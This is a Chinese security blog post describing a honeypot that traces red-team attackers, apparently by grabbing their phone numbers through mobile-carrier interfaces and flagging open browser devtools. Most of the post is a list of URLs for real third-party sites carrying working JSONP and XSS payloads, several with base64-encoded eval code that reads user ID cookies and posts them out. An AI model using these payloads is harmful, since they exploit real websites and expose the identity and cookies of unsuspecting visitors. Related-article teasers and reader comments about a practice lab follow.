[HW] 一种针对红队的新型溯源手段

root10个月前安全技术分享2005

这个蜜罐的溯源方式针对使用手机热点的红队人员。蜜罐直接获取攻击者手机号进行溯源。一抓一个准。各位红队人员小心为妙。

首先打开网站,他会监控是否开启了F12控制台,如果开启了调试模式的话,溯源代码会停止加载。另外,针对使用burp的用户。小心你们的burp版本是否存在chrome的漏洞。

沙箱的特征如下,直接加载js

image.png

image.png

fofa上面可以直接搜索到148条,重点获取手机号js代码,可以看到会获取三大运营商的手机信息

image.png

image.png

解密如下,获取联通的接口

image.png

如果获取到手机号码的话,会将加密的手机号上传

image.png

另外其他溯源接口如下:

https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.4515320024420155

https://bbs.zhibo8.cc/user/userinfo?device=pc&_=1584613345023&callback=jcbDNoDtQbW&callback=callback_165893378313192912

https://myjr.suning.com/sfp/mutualTrust/getLoginInfo.htm?callback=getphone

https://myjr.suning.com/sfp/headPic/getEgoMemberHeadPicUrl.htm

https://ajax.58pic.com/58pic/index.php?m=adManageSystem&a=showAdDeliveryForPosition&callback=%3Cscript%3Eeval(atob(%27ZnVuY3Rpb24gZ2V0Q29va2llKG5hbWUpIAp7IAogICAgdmFyIGFycixyZWc9bmV3IFJlZ0V4cCgiKF58ICkiK25hbWUrIj0oW147XSopKDt8JCkiKTsKIAogICAgaWYoYXJyPWRvY3VtZW50LmNvb2tpZS5tYXRjaChyZWcpKQogCiAgICAgICAgcmV0dXJuIGRlY29kZVVSSUNvbXBvbmVudChhcnJbMl0pOyAKICAgIGVsc2UgCiAgICAgICAgcmV0dXJuIG51bGw7IAp9CndpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoeyJuYW1lIjoicWlhbnR1IiwiZGF0YSI6eyJ1aWQiOmdldENvb2tpZSgicXRfdWlkIil9fSwnKicpOw==%27))%3C/script%3E&position=31&keyword=XXX&_=1590829943379

https://my.zol.com.cn/public_new.php

https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.04630644674906281

https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.38244545320223655

http://my.zol.com.cn/public_new.php

https://loginst.suning.com/authStatus?callback=getuid

https://www.fhyx.com/account/login.html?redirecturl=%22%3E%3CSCrIpT%3Eeval(atob(unescape(location.hash.slice(1))))%3C/SCrIpT%3E

https://so.u17.com/all/%22%3C/span%3E%250a%3Cimg%2520src=1%20onerror=%22document.body.innerHTML=location.search;document.body.innerHTML=document.body.innerText;%22%3E%250a%22/m0_p1.html?<img/src="x"/onerror=a=eval;a(atob(unescape(location.hash.slice(1))))>

https://i.vip.iqiyi.com/client/store/pc/checkout.action?platform=b6c13e26323c537d&fs=&fsSign=&fc=&fv=&qc005=&P00001=&pid=adb3376b039b970b&vipType=2&aid=&device_id=&callback=callback_165893378307001282

https://login.sina.com.cn/sso/login.php?client=&service=&client=&encoding=&gateway=1&returntype=TEXT&useticket=0&callback=sina2&_=1577938268947&callback=callback_165893378307919803

https://v-api-plus.huya.com/jsapi/getUserInfo?callback=jQuery1111007865243652615272_1628490347897&_=1628490347898&callback=callback_165893378306693233

http://mapp.jrj.com.cn/pc/content/getMqNews?vname=%3Csvg%20onload=eval(atob(%27ZnVuY3Rpb24gZ2V0Q29va2llKG5hbWUpIAp7IAogICAgdmFyIGFycixyZWc9bmV3IFJlZ0V4cCgiKF58ICkiK25hbWUrIj0oW147XSopKDt8JCkiKTsKIAogICAgaWYoYXJyPWRvY3VtZW50LmNvb2tpZS5tYXRjaChyZWcpKQogCiAgICAgICAgcmV0dXJuIGRlY29kZVVSSUNvbXBvbmVudChhcnJbMl0pOyAKICAgIGVsc2UgCiAgICAgICAgcmV0dXJuIG51bGw7IAp9CndpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoeyJuYW1lIjoianJqIiwiZGF0YSI6eyJ1aWQiOmdldENvb2tpZSgibXlqcmpfdXNlcmlkIil9fSwnKicpOw==%27))%3E

https://www.ixueshu.com/index.html?v=1608893853571&template=sys_login_ajax.html&_url=123123123%22%22%3E%3CsCrIpT%3Eeval(atob(unescape(location.hash.slice(1))))%3C/sCrIpT%3E

https://hackit.me/v.qq.com/

https://api.csdn.net/oauth/authorize?client_id=1000001&redirect_uri=http://www.iteye.com/auth/csdn/callback&response_type=%22https%3A%2F%2Fapi.csdn.net%2Foauth%2Fauthorize%3Fclient_id%3D1000001%26redirect_uri%3Dhttp%3A%2F%2Fwww.iteye.com%2Fauth%2Fcsdn%2Fcallback%26response_type%3D%22%3E%3Cimg%20src%3Dx%20onerror%3Deval(window.name)%3E



【版权所有@https://github.com/fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp】 

相关文章

典型的恶意挖矿恶意代码家族及自查方法

典型的恶意挖矿恶意代码家族及自查方法

一、典型的恶意挖矿恶意代码家族及自查方法排除过程:    1、执行 netstat  -an 命令,存在异常的 8220 端口连接1.执行 netstat  -...

知识图谱及其在安全领域的应用

知识图谱及其在安全领域的应用

1. 知识图谱是什么?1.1 知识(Knowledge)是什么?知识图谱(Knowledge Graph)正如其名,其本质是为了表示知识[1]。那么知识是该如何定义呢?我们来看一下维基百科中的定义:知...

勒索病毒应急响应自救手册

勒索病毒应急响应自救手册

勒索病毒应急响应自救手册编写说明勒索病毒,是伴随数字货币兴起的一种新型病毒木马,通常以垃圾邮件、服务器入侵、网页挂马、捆绑软件等多种形式进行传播。机器一旦遭受勒索病毒攻击,将会使绝大多数文件被加密算法...

【域控安全】多种域控加固方法

【域控安全】多种域控加固方法

一、概述微软域控提供了入域机器的统一策略管理、ldap认证、DNS、NTP、Kerberos认证、Net-NTLM、PKI证书等多项围绕微软生态的服务。一旦域控被拿下,可通过域控下发策略控制所有入域机...

突发!国内某 macOS 应用下载站遭黑客投毒攻击  企业请迅速自查 (附原文通告PDF)

突发!国内某 macOS 应用下载站遭黑客投毒攻击 企业请迅速自查 (附原文通告PDF)

突发!在线威胁情报通报国内某应用下载站遭黑客投毒攻击企业请,请迅速自查!!!编号: TB-2022-0021报告置信度:90TAG: 软件供应链攻击 macOS &nbs...

Web3 项目安全实践要求 v0.1

Web3 项目安全实践要求 v0.1

0x00 背景概述现今针对 Web3 项目的攻击手法层出不穷,且项目之间的交互也越发复杂,在各个项目之间的交互经常会引入新的安全问题,而大部分 Web3 项目研发团队普遍缺少的一线的安全攻防经验,并且...

评论列表

wolf
2022-07-29 11:26:03

大佬

鱼柒
2022-12-15 16:04:25

大佬,您好,今天不小心通过DVWA命令执行,将主页index.php覆盖为了phpinfo首页,导致了源文件被覆盖。

root_1 回复:
没事,会自动重置
2022-12-15 17:35:09
aini001
2023-03-03 15:23:59

大佬你好,我想用您的靶场进行练习,可能会上传一些nc文件,会可以吗,会重置吗?无论可以与否谢谢大佬的靶场。

root 回复:
会定时重置,随便玩
2023-03-06 22:26:41

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。